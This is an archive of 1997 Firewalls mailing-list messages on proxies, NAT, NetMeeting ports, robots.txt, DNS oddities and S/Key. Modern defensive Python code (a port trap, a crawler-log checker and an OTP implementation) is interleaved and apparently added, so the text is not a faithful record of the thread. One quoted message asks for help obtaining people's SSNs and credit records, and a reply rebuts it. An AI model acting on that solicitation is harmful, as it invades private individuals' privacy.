> -Hume > > > From owner-firewalls-outgoing Fri Jun 6 14:26:20 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA24477 for firewalls-outgoing; Fri, 6 Jun 1997 14:08:31 -0700 (PDT) Received: from 158.152.116.88 (threewiz.demon.co.uk [158.152.116.88]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA24457 for ; Fri, 6 Jun 1997 14:08:16 -0700 (PDT) Received: from monaco (unverified [192.168.1.2]) by monaco.kimble.co.uk (EMWAC SMTPRS 0.83) with SMTP id ; Thu, 05 Jun 1997 01:17:46 +0100 Message-ID: From: "David Harvey-George" To: "M Gillett" , "Ron DuFresne" Cc: Subject: Re: MS TCP/IP BUG ?! Date: Thu, 5 Jun 1997 01:06:54 +0100 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > it is worth noting that a well configured firewall would render this a > non-issue at all hosts other than servers on the DMZ which should be > relatively easy to protect with patches or alternate operating systems. 
That's right, SP4 will be the latest version of RedHat Linux :-) David From owner-firewalls-outgoing Fri Jun 6 14:31:33 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA22069 for firewalls-outgoing; Fri, 6 Jun 1997 13:56:42 -0700 (PDT) Received: from desiree.teleport.com (desiree.teleport.com [192.108.254.21]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA22004 for ; Fri, 6 Jun 1997 13:56:24 -0700 (PDT) Received: from linda.teleport.com (linda.teleport.com [192.108.254.12]) by desiree.teleport.com (8.8.5/8.7.3) with ESMTP id OAA10014 for ; Fri, 6 Jun 1997 14:00:30 -0700 (PDT) Received: (from alano@localhost) by linda.teleport.com (8.8.5/8.8.4) id OAA21647; Fri, 6 Jun 1997 14:00:29 -0700 (PDT) Date: Fri, 6 Jun 1997 14:00:29 -0700 (PDT) From: Alan To: firewalls@greatcircle.com Subject: Commonly hacked ports Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am setting up a few booby traps (ala Klaxon and the like) for various ports on my firewall at work. Any suggestions as to "commonly hacked ports" that I should put detectors on? (I am currently covering the obvious ones like tftp and nfsd.) Also, suggestions on good ways to identify attackers (other than identd and finger) are also welcome. alano@teleport.com | "Those who are without history are doomed to retype it." 
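A minimal trap of the Klaxon-like kind Alan describes, added here as an illustration and not code from the thread or from Klaxon itself: it listens on a port that carries no real service, sends nothing back, and records who connected and when. The service label, the use of port 0 (OS-chosen) and the simulate_probe helper are assumptions for the demonstration; a real deployment would bind the actual port being watched.

```python
import socket
import threading
import time
from datetime import datetime, timezone


class PortTrap:
    """Listen on a TCP port that carries no real service and log every connection.

    Nothing is ever sent back, so a scanner learns only that the port is open;
    the defender gets a timestamped record of the source address and port.
    (A UDP trap, e.g. for tftp, would need a datagram socket instead.)
    """

    def __init__(self, service, port=0, host="127.0.0.1"):
        # service is only a label for the log, e.g. "tftp" or "nfsd";
        # port 0 lets the OS pick a free port, which is convenient for testing.
        self.service = service
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(5)
        self.sock.settimeout(1.0)          # lets serve() check its deadline
        self.port = self.sock.getsockname()[1]
        self.events = []                   # one dict per connection attempt
        self._lock = threading.Lock()

    def _record(self, remote):
        event = {
            "time": datetime.now(timezone.utc).isoformat(timespec="seconds"),
            "service": self.service,
            "trap_port": self.port,
            "remote": remote[0],
            "remote_port": remote[1],
        }
        with self._lock:
            self.events.append(event)
        return event

    def serve(self, max_conns=None, idle_timeout=5.0):
        """Accept connections until max_conns are logged or idle_timeout elapses."""
        seen = 0
        deadline = time.monotonic() + idle_timeout
        while (max_conns is None or seen < max_conns) and time.monotonic() < deadline:
            try:
                conn, remote = self.sock.accept()
            except socket.timeout:
                continue
            # Close at once: no banner, no protocol, nothing for the peer to talk to.
            conn.close()
            self._record(remote)
            seen += 1
        return seen

    def serve_in_background(self, max_conns=None):
        worker = threading.Thread(target=self.serve, args=(max_conns,), daemon=True)
        worker.start()
        return worker

    def format_log(self):
        """Human-readable lines, one per recorded connection."""
        return [
            "{time} trap {service}/{trap_port} connection from {remote}:{remote_port}".format(**e)
            for e in self.events
        ]


def simulate_probe(port, host="127.0.0.1"):
    """Hypothetical helper: a connect-and-close standing in for a scanner's probe."""
    with socket.create_connection((host, port), timeout=2):
        pass


if __name__ == "__main__":
    trap = PortTrap("tftp")
    worker = trap.serve_in_background(max_conns=2)
    simulate_probe(trap.port)
    simulate_probe(trap.port)
    worker.join(timeout=10)
    for line in trap.format_log():
        print(line)
```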
From owner-firewalls-outgoing Fri Jun 6 15:34:19 1997
From: beldridg@cup46ux.cup.hp.com (Brett Eldridge)
To: Mark_Flanagan@radian.com (Mark Flanagan)
Cc: firewalls@GreatCircle.COM
Subject: Re: Microsoft NetMeeting
Date: Fri, 06 Jun 1997 18:09:47 GMT
Message-Id: <33995163.666930@cup46ux.cup.hp.com>
In-Reply-To: <000D79B8.3356@radian.com>

On Thu, 5 Jun 1997 10:51:53 -0500, you wrote:
> Does anyone have or can you point me to a site with the particulars on
> Microsoft NetMeeting. I'm looking for the protocol, ports, security
> risks, etc.
>

This question seems to come up all the time. Here is some stuff from a post about a month ago. It gives the port and protocol info. The security risks depend upon your individual situation. Since it is an unknown protocol and needs to open up the high ports, I would consider it a risk.

- brett

I have included a portion of the text from one of Microsoft's KnowledgeBase articles. You can find the article at:

http://www.microsoft.com/kb/articles/q164/0/38.htm

- brett

---- Text of article ----

Microsoft NetMeeting 2.0 uses several secondary TCP and UDP ports to communicate. To allow NetMeeting to communicate fully, the following ports need to be enabled on the WinSock portion of the Proxy Server:

  389       Internet Locator Server
  522       User Location Server
  1503      T.120 Protocol
  1720      H.323 call setup (TCP)
  1731      Audio call control (TCP)
  Dynamic   H.323 Call Control (TCP)
  Dynamic   H.323 streaming (RTP over UDP)

  Port or Range   Type   Direction
  -------------   ----   ---------
  389             TCP    Inbound
  389             TCP    Outbound
  522             TCP    Inbound
  522             TCP    Outbound
  1025-65535      TCP    Inbound
  1025-65535      TCP    Outbound
  1025-65535      UDP    Inbound
  1025-65535      UDP    Outbound

From owner-firewalls-outgoing Fri Jun 6 15:46:25 1997
From: "David Harvey-George"
To: "Steve Rudolph"
Subject: Re: FW-1 and IP Forwarding on NT Box
Date: Thu, 5 Jun 1997 00:14:29 +0100

> I followed all of Microsoft's recommendations.

Possibly a bad move.

> Two nic cards a and b

Sounds like the start of a stand-up comedy routine

>
> A is set with default gateway of b
> and b is set with gateway of a

it is!

Okay, look, the system with the two cards knows how to route to each network. All you've gotta do is set up the default gateway for workstations on network A (NIC A) and the default gateway for workstations on network B (NIC B). Don't touch anything on the router (other than enabling IP forwarding) if your network really is this simple (e.g. no other routes). If you have other routes then use the route command directly.

> Workstations can ping a and b
> Workstations cannot ping network b
> Ip forwarding is enabled and my route print matches exactly the format of
> Microsoft's recommendations.
>
> I really need to get this up and running. I would get you the route print,
> but I cannot get the addresses to copy onto the clip board..duh :)

I think you'd better send us the output from netstat on both the 'router' and the workstations. Run netstat -rn from a DoZ window, click on the little DoZ icon at the left of the title bar, select edit/mark, mark the stuff you want to send, copy it and paste it.

David

From owner-firewalls-outgoing Fri Jun 6 15:53:37 1997
From: Bill Stout
To: Ryan Russell/SYBASE, firewalls
Subject: Re: Stateful Packet Filters vs. Proxies
Date: Fri, 06 Jun 1997 11:15:43 -0700
Message-Id: <2.2.32.19970606181543.0074a4a4@vaxf.pios.com>

Forgive my criticisms:

The paper is founded on some incorrect assumptions.

It groups application specific proxies with generic proxies. Generic or 'plug-gw' proxies are not desirable because they don't filter application commands, and are viewed as nearly as weak as packet filtering. Application specific proxies are aware (to varying levels) of application commands.

A proxy server typically comprises application specific proxies, and does not comprise only generic proxies. Generic proxies are avoided at all costs, at least until management wants 'something added'. Occasionally generic proxies are used as a last resort, then replaced; for example RealAudio and SQLnet were initially filtered with plug-gw proxies until application (RealAudio/SQLnet) specific proxies were released.

The paper then continues to compare generic proxy functions with packet filters and concludes they are the same. A discussion on NAT ensues which is not an equivalent technology to either.

Bill Stout

At 12:29 AM 6/6/97 -0400, Ryan Russell/SYBASE wrote:
>Well, I finally got around to writing down my arguments
>on the above subject. Check it out at:
>
>http://futon.sfsu.edu/~rrussell/spfvprox.htm
>
>Warning: It's lengthy.
>
>Comments welcome.
>
> Ryan
>
_____________________________________________________________________________
Bill Stout (Systems Engineer/Consultant)                 stoutb@pios.com
Pioneer Standard (Computer Systems & Components)         http://www.pios.com/
San Jose, CA (Location of 1 of 52 U.S. offices)          (408) 954-9100
*My opinions do not reflect that of the company, and vice versa, thankfully.*

From owner-firewalls-outgoing Fri Jun 6 15:58:48 1997
From: Alan
To: Joe Klemmer
Cc: firewalls@GreatCircle.COM
Subject: Re: nt web server log
Date: Fri, 6 Jun 1997 13:56:52 -0700 (PDT)

On Fri, 6 Jun 1997, Joe Klemmer wrote:
> On Fri, 6 Jun 1997, Eric Schult wrote:
>
> > > There is no file or image that is related to this file name on our web
> > > page. Could not even find it on the server anywhere. Am I unduly
> > > concerned?
> >
> > No, don't be concerned. Many (well behaved) web indexers (and other "robots")
> > will look for this file, which may contain instructions to NOT index
> > a particular site.
> >
> > I don't know what you'd put in it, I only know that its use is not
> > a threat.
>
> It may not be a direct threat but it can be an indirect one.
> There was a very good article last year about how not using robots.txt in
> some cases can bring your system to a crawling halt. I believe the
> article was in Web Techniques and it told how one web site was completely
> swamped by requests from the crawlers that it forces the CPU usage up to
> near 100% and thus made the site inaccessible. It was not an attack or
> anything but it had the same effect as a Denial of Service attack.

The article was on a robot that got caught in the cgi for the genome database. It tried to index a few million (cgi generated) pages of data.

robots.txt will protect against well written web crawlers, but not against ones that ignore robots.txt. (There have been a few spotted.) The only way to deal with those is heavy weaponry.

[Why am I reminded of the SNL parody commercial selling "Killer Robot protection insurance to senior citizens..."? Must be a Friday thing...]

alano@teleport.com | "Those who are without history are doomed to retype it."

From owner-firewalls-outgoing Fri Jun 6 15:58:46 1997
From: "David Harvey-George"
Subject: Re: Microsoft Proxy Server
Date: Thu, 5 Jun 1997 01:03:18 +0100

Daniel T. Tamagochi wrote:-
> Microsoft's Proxy Server was subjected to extensive security testing and
> evaluation from independent testing agency, Coopers & Lybrand's Information
> Technology Security Services and is resistant to common attacks such as "IP
> Spoofing", "SATAN", and "ISS." This level of security is not typically
> found other proxy servers on the market.

Erm, it's found on AltaVista firewall for one. Anyway SATAN isn't a great tool for testing NT network security so I would expect MS Proxy to be okay. Dunno about Coopers and Lybrand; this paragraph particularly struck me when I read the original M$ B$. They may be great guys, they may have hired great guys, but who's actually heard of them in this context? The refs to SATAN worry me, bit like taking a lock-picker's kit to a biometric entry system.

> Integrated Dial-Up Networking Support- using the Auto-Dial tool, Microsoft
> Proxy Server provides exceptional support for networks that use dial-up
> links for access to the Internet.

Yeah, it's a bit crap on version 1.0 though.

The rest of the proxy server is okay but calling it a firewall solution is a bit rich. I think the AltaVista proxy firewall is a bit more like it. As far as proxies go, I've found the Netscrape or WinGate proxies better solutions on the NT platform for many uses.

David

From owner-firewalls-outgoing Fri Jun 6 17:06:28 1997
From: peter@baileynm.com (Peter da Silva)
To: klemmerj@webtrek.com
Cc: firewalls@GreatCircle.COM
Subject: Re: nt web server log
Date: Fri, 6 Jun 1997 15:44:11 -0500 (CDT)
Message-Id: <9706062044.AA13457@sonic.nmti.com.nmti.com>
In-Reply-To: from "Joe Klemmer" at Jun 6, 97 03:15:02 pm

> It may not be a direct threat but it can be an indirect one.
> There was a very good article last year about how not using robots.txt in
> some cases can bring your system to a crawling halt. I believe the
> article was in Web Techniques and it told how one web site was completely
> swamped by requests from the crawlers that it forces the CPU usage up to
> near 100% and thus made the site inaccessible. It was not an attack or
> anything but it had the same effect as a Denial of Service attack.

I had about 10,000 pages on my home box indexed by the crawlers last year. It took 7 months of begging to get them out. In the meantime my phone line was busy 100% for 3 weeks until I figured out what the problem was, and then it was pretty clogged even though my webserver was 404ing everything.

What happened was *one* crawler managed to grab something in a server I was running at home, testing out some web pages before deploying them. Then it turned into a feeding frenzy.

The really annoying thing was that these sites were returning pages at my home box INSTEAD of the more recently updated ones online!

The thing is, if a webcrawler is returning pages that have been sending a 404 for 7 months, how much can it be trusted?
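Since robots.txt only restrains crawlers that choose to honour it, as Alan's and Peter's messages above both note, the practical check is the web server's access log. The following is an added example and not code from the thread: it parses a few constructed Common Log Format lines against a constructed robots.txt and reports clients that fetch disallowed paths, or that walk the site faster than a chosen rate, whether or not they ever asked for robots.txt. The paths, addresses and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: a small robots.txt of the kind the thread describes,
# keeping crawlers out of CGI-generated pages (hypothetical paths).
ROBOTS_TXT = """\
User-agent: *
Disallow: /cgi-bin/
Disallow: /genome/
"""

# Constructed Common Log Format lines. 10.0.0.5 reads robots.txt and obeys it;
# 192.0.2.77 never asks for it and walks the CGI tree anyway.
ACCESS_LOG = """\
10.0.0.5 - - [06/Jun/1997:13:56:01 -0700] "GET /robots.txt HTTP/1.0" 200 48
10.0.0.5 - - [06/Jun/1997:13:56:02 -0700] "GET /index.html HTTP/1.0" 200 1204
10.0.0.5 - - [06/Jun/1997:13:56:05 -0700] "GET /about.html HTTP/1.0" 200 812
192.0.2.77 - - [06/Jun/1997:13:57:10 -0700] "GET /index.html HTTP/1.0" 200 1204
192.0.2.77 - - [06/Jun/1997:13:57:10 -0700] "GET /cgi-bin/query?id=1 HTTP/1.0" 200 5120
192.0.2.77 - - [06/Jun/1997:13:57:11 -0700] "GET /cgi-bin/query?id=2 HTTP/1.0" 200 5120
192.0.2.77 - - [06/Jun/1997:13:57:11 -0700] "GET /genome/seq?n=99 HTTP/1.0" 200 9000
192.0.2.77 - - [06/Jun/1997:13:57:12 -0700] "GET /cgi-bin/query?id=3 HTTP/1.0" 404 0
"""

# host ident user [time] "method path protocol" status bytes
CLF = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def parse_robots(text):
    """Return the Disallow prefixes that apply to User-agent: * (other agents ignored)."""
    prefixes, applies = [], False
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            applies = value == "*"
        elif key == "disallow" and applies and value:
            prefixes.append(value)
    return prefixes


def parse_log(text):
    """Parse CLF lines into dicts; the query string is dropped because robots rules match paths."""
    records = []
    for line in text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["when"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
        rec["path"] = rec["path"].split("?", 1)[0]
        records.append(rec)
    return records


def find_rogue_crawlers(log_text, robots_text, max_rate=2.0):
    """Clients that fetched a disallowed path or exceeded max_rate requests per second."""
    disallowed = parse_robots(robots_text)
    by_host = defaultdict(list)
    for rec in parse_log(log_text):
        by_host[rec["host"]].append(rec)
    report = {}
    for host, recs in by_host.items():
        fetched_robots = any(r["path"] == "/robots.txt" for r in recs)
        violations = [r["path"] for r in recs
                      if any(r["path"].startswith(p) for p in disallowed)]
        span = (recs[-1]["when"] - recs[0]["when"]).total_seconds()
        rate = len(recs) / span if span > 0 else float(len(recs))
        if violations or rate > max_rate:
            report[host] = {
                "fetched_robots_txt": fetched_robots,
                "violations": violations,
                "requests_per_second": round(rate, 2),
            }
    return report


if __name__ == "__main__":
    for host, info in find_rogue_crawlers(ACCESS_LOG, ROBOTS_TXT).items():
        print(host, info)
```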
From owner-firewalls-outgoing Fri Jun 6 17:16:44 1997
From: Tod McQuillin
To: Ian Miller
Cc: Doug Luce, Firewalls mailing list
Subject: Re: Unknown log entry...
Date: Fri, 6 Jun 1997 17:52:41 -0500 (CDT)
In-Reply-To: <199706060840.JAA03650@h01.scientia.com>

This is set up along the lines described in the internet draft "Classless IN-ADDR.ARPA delegation", available at

http://ds.internic.net/internet-drafts/draft-ietf-dnsind-classless-inaddr-03.txt

If your firewall isn't able to cope with this it probably should -- this sort of setup is becoming more and more common as subnets smaller than 8 bits are being delegated to different zones of authority.

--
Tod McQuillin

On Fri, 6 Jun 1997, Ian Miller wrote:
> [Also sent to Firewalls mailing list, the source
> of the message I am replying to - Ian]
>
> At 19:05 05/06/97 -0700, Cihan Subasi wrote:
> >I had those two lines in my firewall logs, can anybody explain to me what
> >they are???
> >
> >--------------------------------------------------
> >Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for
> >"66.3.196.208.in-addr.arpa IN PTR", got type "CNAME"
> >Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for
> >"66.3.196.208.in-addr.arpa", got "66.64.3.196.208.in-addr.arpa"
> >--------------------------------------------------
>
> Your mail server has tried to do a reverse lookup on IP address 208.196.3.66
> (karnov.lm.com) and has got some VERY odd results. Reverse lookup on IP address
> ... is done by looking up domain ....in-addr.arpa.
> This should contain PTR (name->IP) records. However if you look up
> 208.196.3.66 you get:-
> CNAME/ARPA "66.3.196.208.in-addr.arpa" 6h "66.64.3.196.208.in-addr.arpa"
> CNAME records are name->name (alias) records. This is weird for an
> in-addr.arpa domain and it has not surprisingly confused your firewall. If
> you follow up the (I think non-sensical) CNAME you get:
>
> PTR/ARPA "66.64.3.196.208.in-addr.arpa" 1d "karnov.lm.com"
>
> I have no idea why this DNS is set up this way.
>
> Ian
>

From owner-firewalls-outgoing Fri Jun 6 17:31:16 1997
From: Ryan Russell/SYBASE
To: Bill Stout
Cc: firewalls
Subject: Re: Stateful Packet Filters vs. Proxies
Date: 6 Jun 97 14:03:46 EDT
Message-Id: <199706062056.NAA23016@notesgw2.sybase.com>

Criticisms are welcome.

I was thinking today that I should say more about application-specific proxies vs. generic proxies. Socks is a good example of a generic proxy (at least I believe that is the case) and is indeed roughly equivalent to a packet filter, which is one of my points. At least you agree on that.

One of the things I'd like to have to better educate myself is a list of proxies that do a good job of understanding and interacting with the protocols.

But, I think my point still stands, that if you have more than a couple of protocols you have to proxy, and you want to utilize non-generic proxies, then you will end up using unrelated proxy software for some of the protocols (your examples of RealAudio and SQLNet are good ones) and they will have different feature sets, security models, and yes, bugs. Translate bugs to mean potential holes or weaknesses.

The converse of that could be: If you have n proxies that all understand and interact with the protocol in a meaningful way, and they all have 0 bugs, and they work exactly how you want, isn't that better than a layer 4 SPF? Yup.

The above situation is a case where a SPF, as a unified security program, may be a better choice. It would be extremely difficult to pick the cutoff point (i.e. if you have 5 proxies, just go to SPF) given that you probably lose some control over the protocols that you had before, but are now dealing with fewer holes, etc.

BTW, doesn't the proxy for SQLNet exist because the protocol is complex, not to increase correctness of the data? I.e. a non-stateful packet filter would have to leave too many ports "open"?

As for the last part of your note: I'll go back and re-read how I worded my conclusions, but what I mean to say is that generic proxies are equivalent to stateful packet filters.

I also conclude that NAT is darn close to a generic proxy and a SPF, if you are using many-to-few translation and the NAT device doesn't allow the outside to initiate connections, which is probably a side-effect of most implementations of many-to-few NAT.

Thanks for the feedback.

Ryan

---------- Previous Message ----------
To: Ryan.Russell, firewalls
cc:
From: stoutb@pios.com (Bill Stout) @ smtp
Date: 06/06/97 11:15:43 AM
Subject: Re: Stateful Packet Filters vs. Proxies

Forgive my criticisms:

The paper is founded on some incorrect assumptions.

It groups application specific proxies with generic proxies. Generic or 'plug-gw' proxies are not desirable because they don't filter application commands, and are viewed as nearly as weak as packet filtering. Application specific proxies are aware (to varying levels) of application commands.

A proxy server typically comprises application specific proxies, and does not comprise only generic proxies. Generic proxies are avoided at all costs, at least until management wants 'something added'. Occasionally generic proxies are used as a last resort, then replaced; for example RealAudio and SQLnet were initially filtered with plug-gw proxies until application (RealAudio/SQLnet) specific proxies were released.

The paper then continues to compare generic proxy functions with packet filters and concludes they are the same. A discussion on NAT ensues which is not an equivalent technology to either.

Bill Stout

At 12:29 AM 6/6/97 -0400, Ryan Russell/SYBASE wrote:
>Well, I finally got around to writing down my arguments
>on the above subject. Check it out at:
>
>http://futon.sfsu.edu/~rrussell/spfvprox.htm
>
>Warning: It's lengthy.
>
>Comments welcome.
>
> Ryan
>
_____________________________________________________________________________
Bill Stout (Systems Engineer/Consultant)                 stoutb@pios.com
Pioneer Standard (Computer Systems & Components)         http://www.pios.com/
San Jose, CA (Location of 1 of 52 U.S. offices)          (408) 954-9100
*My opinions do not reflect that of the company, and vice versa, thankfully.*

From owner-firewalls-outgoing Fri Jun 6 18:36:37 1997
From: "A. C."
To: firewalls@GreatCircle.COM
Subject: Re: Secure Pop3?
Date: Fri, 06 Jun 1997 12:34:27 -0700
Message-ID: <33986643.466A@guest.net>

Bradley Smith wrote:
>
> Try the APOP option.. Granted, it's not much, but it's better than
> cleartext.
>
> Alternatively, if you're into S&M you could kerberize it :-)
> Or, you could go to something like S/Key or SecurID.
>
> -brad
>

What is S/Key? I have seen this on a telnet session, after giving the login name.
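S/Key, as asked about above, is a one-time password scheme (RFC 1760, generalised as OTP in RFC 2289): the server stores the result of hashing a secret N times, and the prompt seen after the login name ("otp-md5 97 seed") asks the client for the (N-1)-fold hash, which can be used once and is then useless to anyone who sniffed it. The following is an added illustration, not code from the thread; it uses the RFC 2289 MD5 variant (MD5 digest folded to 64 bits) in place of the original MD4, and the user name, pass phrase, seed and sequence count are constructed.

```python
import hashlib


def otp_step(data: bytes) -> bytes:
    """One hash step of the RFC 2289 MD5 variant: digest, then fold 128 -> 64 bits
    by XORing the two halves. RFC 1760 S/Key did the same with MD4."""
    digest = hashlib.md5(data).digest()
    return bytes(a ^ b for a, b in zip(digest[:8], digest[8:]))


def compute_otp(passphrase: str, seed: str, count: int) -> bytes:
    """The one-time password for sequence number `count`: an initial step over
    seed||passphrase, followed by `count` further hash steps."""
    x = otp_step((seed.lower() + passphrase).encode("ascii"))
    for _ in range(count):
        x = otp_step(x)
    return x


class OtpServer:
    """Server side. Stores only the current sequence number, the seed and the last
    accepted password; the pass phrase itself never reaches the server."""

    def __init__(self, username, seed, last_accepted, sequence):
        self.username = username
        self.seed = seed
        self.last_accepted = last_accepted   # == compute_otp(passphrase, seed, sequence)
        self.sequence = sequence

    def challenge(self):
        # What the user sees after typing the login name.
        return "otp-md5 %d %s" % (self.sequence - 1, self.seed)

    def verify(self, candidate: bytes) -> bool:
        # Hashing the presented password once must reproduce the stored value.
        if self.sequence <= 0 or otp_step(candidate) != self.last_accepted:
            return False
        # Accepted: move the chain forward so this password can never be replayed.
        self.last_accepted = candidate
        self.sequence -= 1
        return True


def enroll(username, passphrase, seed, sequence=99):
    """Initial setup, normally done with keyinit over a trusted channel."""
    return OtpServer(username, seed, compute_otp(passphrase, seed, sequence), sequence)


def client_response(passphrase, challenge):
    """Client side: parse the challenge and compute the requested one-time password."""
    _, count, seed = challenge.split()
    return compute_otp(passphrase, seed, int(count))


if __name__ == "__main__":
    # Constructed credentials for the demonstration.
    server = enroll("alice", "correct horse battery staple", "sk1234")
    chal = server.challenge()
    resp = client_response("correct horse battery staple", chal)
    print(chal, resp.hex(), server.verify(resp))      # accepted once
    print("replay:", server.verify(resp))              # refused: chain already advanced
```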
From owner-firewalls-outgoing Fri Jun 6 19:01:27 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA22012 for firewalls-outgoing; Fri, 6 Jun 1997 18:52:16 -0700 (PDT) Received: from proxy4.ba.best.com (proxy4.ba.best.com [206.184.139.15]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA21950 for ; Fri, 6 Jun 1997 18:51:51 -0700 (PDT) Received: from shellx.best.com (shellx.best.com [206.86.0.11]) by proxy4.ba.best.com (8.8.5/8.8.3) with ESMTP id SAA00515; Fri, 6 Jun 1997 18:54:02 -0700 (PDT) Received: from localhost (kgibbs@localhost) by shellx.best.com (8.8.5/8.8.3) with SMTP id SAA18616; Fri, 6 Jun 1997 18:51:56 -0700 (PDT) Date: Fri, 6 Jun 1997 18:51:55 -0700 (PDT) From: "Kelly E. Gibbs" To: Ryan Russell/SYBASE cc: Bill Stout , firewalls Subject: Re: Stateful Packet Filters vs. Proxies In-Reply-To: <199706062056.NAA23016@notesgw2.sybase.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At what level does the NAT occur in the OSI model? So far I've heard 2 and 4... whats the right answer? On 6 Jun 1997, Ryan Russell/SYBASE wrote: > Criticisms are welcome. > > I was thinking today that I should say more about > application-specific proxies vs. generic proxies. > Socks is a good example of a generic proxy (at > least I believe that is the case) and is indeed > roughly equivalent to a packet filter, which is one > of my points. At least you agree on that. > > One of the things I'd like to have to better educate > myself is a list of proxies that do a good job of > understanding and interacting with the protocols. 
> > But, I think my point still stands, that if you have > more than a couple of protocols you have to > proxy, and you want to utilize non-generic proxies, > then you will end up using unrelated proxy software > for some of the protocols (Your examples of > RealAudio and SQLNet are good ones) and they will > have different feature sets, security models, and yes, > bugs. Translate bugs to mean potential holes or > weaknesses. > > The converse of that could be: If you have n proxies > that all understand and interact with the protocol > in a meaningful way, and they all have 0 bugs, > and they work exactly how you want, isn't that > better than a layer 4 SPF? Yup. > > The above situation is a case where a SPF, as a > unified security program, may be a better choice. > It would be extreamly difficult to pick the cutoff > point (i.e. if you have 5 proxies, just go to SPF) given > that you probably lose some control over the protocols > that you had before, but are now dealing with less holes, etc.. > > BTW, doesn't the proxy for SQLNet exist because the > protocol is complex, not to increase correctness of the > data? I.e. a non-stateful packet filter would have to leave > too many ports "open"? > > As for the last part of your note: I'll go back and > re-read how I worded my conclusions, but what I mean > to say is that generic proxies are equivalent to > stateful packet filters. > > I also conclude that NAT is darn close to a generic proxy > and a SPF, if you are using many-to-few translation > and the NAT device doesn't allow the outside to initiate > connections, which is probably a side-effect of most > implmentations of many-to-few NAT. > > Thanks for the feedback. > Ryan > > > ---------- Previous Message ---------- > To: Ryan.Russell, firewalls > cc: > From: stoutb@pios.com (Bill Stout) @ smtp > Date: 06/06/97 11:15:43 AM > Subject: Re: Stateful Packet Filters vs. Proxies > > Forgive my criticisms: > > The paper is founded on some incorrect assumptions. 
> > It groups application specific proxies with generic proxies. Generic or > 'plug-gw' proxies are not desireable because they don't filter application > commands, and are viewed as nearly as weak as packet filtering. Application > specific proxies are aware (to varying levels) of application commands. > > A proxy server typically comprises of application specific proxies, and does > not comprise of only generic proxies. Generic proxies are avoided at all > costs, at least until management wants 'something added'. Occasionally > generic proxies are used as last resort, then replaced, for example > RealAudio and SQLnet were initially filtered with plug-gw proxies until > application (RealAudio/SQLnet) specific proxies were released. > > The paper then continues to compare generic proxy functions with packet > filters and concludes they are the same. A discussion on NAT ensues which > is not an equivalent technology to either. > > Bill Stout > > At 12:29 AM 6/6/97 -0400, Ryan Russell/SYBASE wrote: > >Well, I finally got around to writing down my arguments > >on the above subject. Check it out at: > > > >http://futon.sfsu.edu/~rrussell/spfvprox.htm > > > >Warning: It's lengthy. > > > >Comments welcome. > > > > Ryan > > > _____________________________________________________________________________ > Bill Stout (Systems Engineer/Consultant) stoutb@pios.com > Pioneer Standard (Computer Systems & Components) http://www.pios.com/ > San Jose, CA (Location of 1 of 52 U.S. 
> offices) (408) 954-9100
> *My opinions do not reflect that of the company, and vice-versa, thankfully.*
>

From owner-firewalls-outgoing Fri Jun 6 19:16:27 1997
From: Joseph Seanor
Date: Fri, 6 Jun 1997 16:18:32 -0700 (PDT)
To: -= TaLoN =-
Cc: firewalls@GreatCircle.COM
Subject: Re: IP SPOOFING

On Thu, 12 Jun 1997, -= TaLoN =- wrote:
> Also, looking for assistance in finding information on people. (i.e.
> SSN, CREDIT RECORDS, ETC.) please email me AS SOON as you get any
> information.
> Once Again, please email me : Talon@mail.org
>
> Jason Burton - Certified Network Investigator
> Vector Classified Section

Just to let you know that by trying to gather this type of information
that is listed above, you could be breaking your local State laws, and by
trying to get Credit Records you are breaking Federal regulations.
Joseph Seanor
CIBIR Corporation
Computer Crime Investigators
Licensed & Insured Private Investigators

From owner-firewalls-outgoing Fri Jun 6 19:29:24 1997
From: "Paquette, Trevor"
Date: Fri, 6 Jun 1997 17:15:33 -0600
To: "'Ian Poynter'", "'Walczak, Joe'", firewalls@GreatCircle.COM
Subject: RE: ISP Connection

We have insurance for damage that may be caused by a break-in. I don't know
what type of insurance it is, but it is supposed to cover us in those
situations.

> -----Original Message-----
> From: Ian Poynter [SMTP:ian@jerboa.com]
> Sent: Friday, June 06, 1997 2:13 PM
> To: Paquette, Trevor; 'Walczak, Joe'; firewalls@GreatCircle.COM
> Subject: RE: ISP Connection
>
> At 12:01 AM 6/5/97 -0600, Paquette, Trevor wrote:
> >There are companies (mine included) that do manage firewalls for
> >other companies, and we do a pretty damn good job at it. Our clients
> >TRUST us to do it for them. WE are the ones on the hook for any
> >break-ins and possible damage resulting from any outside
> >security incidents.
>
> I agree that whether to outsource firewall management (or anything
> else for that matter) is not a black and white issue. Trust, most of it
> subjectively evaluated, has a lot to do with how these decisions get
> made.
>
> However what I'm curious about is whether mcc.net is really completely
> "on the hook" in this situation. BBN's SitePatrol, for example, comes
> with an extensive indemnification clause in its agreements ("if you're
